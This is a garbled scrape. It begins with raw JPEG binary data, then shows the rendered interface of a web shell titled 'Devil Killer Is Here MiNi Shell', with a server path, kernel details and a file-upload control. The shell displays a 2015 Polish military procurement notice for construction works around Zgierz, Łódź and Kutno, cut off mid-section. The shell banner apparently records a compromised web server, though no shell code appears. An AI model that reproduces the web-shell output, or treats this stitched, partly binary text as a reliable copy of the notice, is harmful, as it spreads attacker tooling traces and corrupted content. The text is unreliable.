JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/81072-N-2015.html

<p class="kh_header"><b>Zgierz: Roboty budowlane w Tomaszowie Mazowieckim (zadania nr 1,2,3) , w Nowym Glinniku  (zadania nr 4,5) , w Zgierzu (zadanie nr 6) ,w  Łodzi (zadanie nr 7,8,9) oraz w Kutnie  (zadanie nr 10) numer sprawy 48/ZP/15</b><br>
<b>Numer ogłoszenia: 81072 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 31 Wojskowy Oddział Gospodarczy , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 261 442 098, faks 261 442 101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.31wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w Tomaszowie Mazowieckim (zadania nr 1,2,3) , w Nowym Glinniku  (zadania nr 4,5) , w Zgierzu (zadanie nr 6) ,w  Łodzi (zadanie nr 7,8,9) oraz w Kutnie  (zadanie nr 10) numer sprawy 48/ZP/15.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia (numer sprawy 48/ZP/15) są roboty budowlane ; Remont ogrodzenia przy budynku nr 35 w Tomaszowie Mazowieckim  (zadanie nr 1) Wymiana stolarki okiennej oraz krat w budynku nr 35  w Tomaszowie Mazowieckim (zadanie nr 2)  , Wymiana chodników w Tomaszowie Mazowieckim ( zadanie nr 3 ) , Remont instalacji elektrycznej w budynku nr 45 w Nowym Glinniku   (zadanie nr 4) , Remont węzłów sanitarnych   w budynku nr 133 w Nowym Glinniku   (zadanie nr 5) , Remont węzłów sanitarnych  w budynku nr 3 w Zgierzu  (zadanie nr 6) , Wymiana stolarki okiennej w  budynku nr 43 Łodzi  (zadanie nr 7)  , Naprawa elewacji                      w  budynku nr 4  w Łodzi ( zadanie nr 8 ), Wykonanie robót malarskich                   w  budynku RWKL  w Łodzi ( zadanie nr 9 ) , Rozbiórka w  budynku nr 59 w Kutnie ( zadanie nr 10 )
2.Szczegółowy opis przedmiotu zamówienia określają :
Dla Zadania nr 1 ogrodzenie przy budynku nr 35 w Tomaszowie Mazowieckim                                                                                                     
 załącznik nr 9  do SIWZ   przedmiar robót  i specyfikacja techniczna 
Dla Zadania nr 2 budynek nr 35 w Tomaszowie Mazowieckim                                    
załącznik nr 10  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 3 chodniki w Tomaszowie Mazowieckim                                                                             załącznik nr 11  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 4 budynek nr 45 w Nowym Glinniku                                                                załącznik nr 12  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 5 budynek nr  133 w Nowym Glinniku                                                                     załącznik nr 13  do SIWZ przedmiar robót  i specyfikacja techniczna                                                                                      
Dla Zadania nr 6 budynek nr  3 w Zgierzu                                                                      załącznik nr 14  do SIWZ przedmiar robót  i specyfikacja techniczna                      Dla Zadania nr 7 budynek nr  43 w Łodzi                                                                     załącznik nr 15  do SIWZ przedmiar robót  i specyfikacja techniczna 
Dla Zadania nr 8 budynek nr  4 w Łodzi                                                                     załącznik nr 16  do SIWZ przedmiar robót  i specyfikacja techniczna   
Dla Zadania nr 9 budynek RWKL  w Łodzi                                                                     załącznik nr 17  do SIWZ przedmiar robót  i specyfikacja techniczna   
Dla Zadania nr 10 budynek nr  59 w Kutnie                                                                   załącznik nr 18  do SIWZ przedmiar robót  i specyfikacja techniczna   
3.Lokalizacja obiektów
Zadanie nr 1,2,3 ogrodzenie , budynek nr 35 , chodniki  w Tomaszowie Mazowieckim   ul. Piłsudskiego 72  , 97-200 Tomaszów Mazowiecki
Zadanie nr 4,5   budynki  nr 45 , nr 133  w Nowym Glinniku                                                                 
Jednostka Wojskowa nr 4392 Nowy Glinnik  97-217 Lubochnia  
Zadania nr 6  budynek nr 3 w Zgierzu 
ul. Konstantynowska 85 , 95-100 Zgierz 
Zadania nr 7  budynek nr 43 w Łodzi  ul. 1-go Maja  90  ,  90-766 Łódź 
Zadania nr 8  budynek nr 4 w Łodzi  ul. 6-go Sierpnia 92 , 90-646 Łódź
Zadania nr 9  budynek RWKL w Łodzi ul. Żeromskiego 113  , 94-294  Łódź                                                            
Zadanie nr 10  budynek nr 59 Kutno 
99-300 Skład  Kutno ul. Bohaterów Walk nad Bzurą                                                                       
Wykonawca będzie wykonywał roboty w godzinach 7:30-15:30  
dla zadań nr 1-9 .
Wykonawca będzie wykonywał roboty w godzinach 7:00-15:00 
dla zadania nr 10 ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.24.00.00-2, 43.54.00.00-2, 45.42.11.00-5, 45.23.32.60-9, 45.11.12.20-6, 45.42.11.31-1, 45.44.21.00-8, 45.30.00.00-0, 45.31.00.00-3, 45.31.11.00-1, 45.31.23.11-0, 45.31.60.00-5, 45.31.70.00-2, 45.33.00.00-9, 45.31.12.00-2, 45.45.30.00-7, 45.32.00.00-6, 45.43.11.00-8, 45.43.12.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość oraz formy wniesienia wadium dla poszczególnych zadań zostały określone w rozdziale XI Specyfikacji Istotnych Warunków Zamówienia .</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 1  ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż  posiada  doświadczenie zdobyte poprzez wykonanie zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone w okresie ostatnich 5 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania ofert, co najmniej 2  robót budowlanych  odpowiadającej  przedmiotowi niniejszego zamówienia tj. w zakresie robót ogólno-budowlanych -  o wartości nie mniejszej niż : 
Dla zadania nr 1 - 100.000,00 zł brutto każda z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 2  - 50.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 3  - 100.000,00 zł brutto każda z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 4  - 50.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr 5  - 200.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr  6 - 200.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr  7 - 10.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr  8 - 50.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ


Dla zadania nr  9 - 5.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie  z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ
Dla zadania nr  10 - 20.000,00 zł brutto każda  z podaniem ich rodzaju i wartości, daty  i miejsca wykonywania  oraz załączeniem dowodów / dokumentów , że roboty zostały wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończone -  w formie stosownego złożonego przez Wykonawcę  oświadczenia tj.  wg załącznika nr 5 do SIWZ

Uwaga: W przypadku złożenia oferty na kilka zadań ,  Wykonawca zobowiązany jest załączyć wykaz dwóch robót, przy czym wartość każdej nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia Wykonawca oferuje. 
Jeżeli Wykonawca zaoferuje realizację zamówienia   w zakresie zadania nr 1            i  nr 2 wówczas musi wykazać należyte wykonanie co najmniej  dwóch robót                ogólno-budowlanych o wartości nie mniejszej niż 150.000,00 złotych brutto  każda   (100.000,00 + 50.000,00) wg załącznika nr 5 do SIWZ .
Dla wszystkich zadań nr 1-10  Wykonawca musi wykazać należyte wykonanie                co najmniej  dwóch robót  ogólno-budowlanych o wartości nie mniejszej niż 785.000,00 złotych brutto każda   wg załącznika nr 5 do SIWZ .                                  
Brak takiego dokumentu spowoduje, że zamówienie zostanie uznane za niezrealizowane .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 3 ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony, jeżeli Wykonawca wykaże, iż dysponuje kierownikiem budowy posiadającym :
dla zadań  nr 1-10  uprawnienia budowlane o specjalności konstrukcyjno budowlanej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej  12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
dla zadań nr 4,5,6  uprawnienia budowlane o specjalności elektrycznej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej 12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy .
dla zadań nr 5,6  uprawnienia budowlane o specjalności sanitarnej  bez ograniczeń lub w ograniczonym zakresie  należącym do Izby Inżynierów Budownictwa oraz co najmniej 12  miesięczne doświadczenie w pełnieniu funkcji kierownika budowy . 
Za spełnienie w/w warunku Zamawiający uzna zarówno wykazanie się
minimum jedną osobą posiadającą łącznie w/w uprawnienia jak 
i wykazanie się inną ilością osób posiadających łącznie w/w uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę stosownego  oświadczenia   w trybie art. 22 ust. 1 pkt. 4  ustawy Pzp -  tj. wg załącznika  nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany umowy mogą być dokonywane za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności, w formie aneksu do niniejszej umowy, jedynie w sytuacjach określonych w art. 144 Pzp, tj. 1). w przypadku zmniejszenia wynagrodzenia: a) w razie wyłączeń obiektów z użytkowania bądź przekazania ich w inny zarząd, lub poza wojsko; b) w razie różnicy pomiędzy przedmiarami, a faktyczną ilością wykonanych robót wynikającą z obmiaru, 2). w przypadku zwiększenia wynagrodzenia, w sytuacji określonej w § 7 ust. 2 umowy. 2. Zmiany osób funkcyjnych - kierownik budowy (po pisemnym poinformowaniu Zamawiającego o zaistniałej zmianie), koordynator ds. BHP, inspektor nadzoru nie stanowią zmiany umowy . 3. Zmiany stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.31wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 31 WOG 95-100 Zgierz ul. Konstantynowska 85 budynek nr 1 pokój 104-105 pon- pt. 7.30-15.30..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2015 godzina 10:00, miejsce: 31 WOG 95-100 ZGIERZ, UL.KONSTANTYNOWSKA 85 BUDYNEK NR 2, I PIĘTRO, POMIESZCZENIE NR 114 (KANCELARIA JAWNA)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont ogrodzenia przy budynku nr 35 w Tomaszowie Mazowieckim  (zadanie nr 1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest remont ogrodzenia przy budynku nr 35 w Tomaszowie Mazowieckim  (zadanie nr 1)
2.Szczegółowy opis przedmiotu zamówienia określa 
Dla Zadania nr 1 ogrodzenie przy budynku nr 35 w Tomaszowie Mazowieckim                                                                                                     
załącznik nr 9  do SIWZ   przedmiar robót  i specyfikacja techniczna 
3.Lokalizacja obiektu    zadanie nr 1 ogrodzenie w Tomaszowie Mazowieckim        ul. Piłsudskiego 72  , 97-200 Tomaszów Mazowiecki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.24.00.00-2, 43.54.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana stolarki okiennej oraz krat w budynku nr 35 w Tomaszowie Mazowieckim (zadanie nr 2).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wymiana stolarki okiennej oraz krat w budynku nr 35 w Tomaszowie Mazowieckim  w Tomaszowie Mazowieckim  (zadanie nr 2)
2.Szczegółowy opis przedmiotu zamówienia określa 
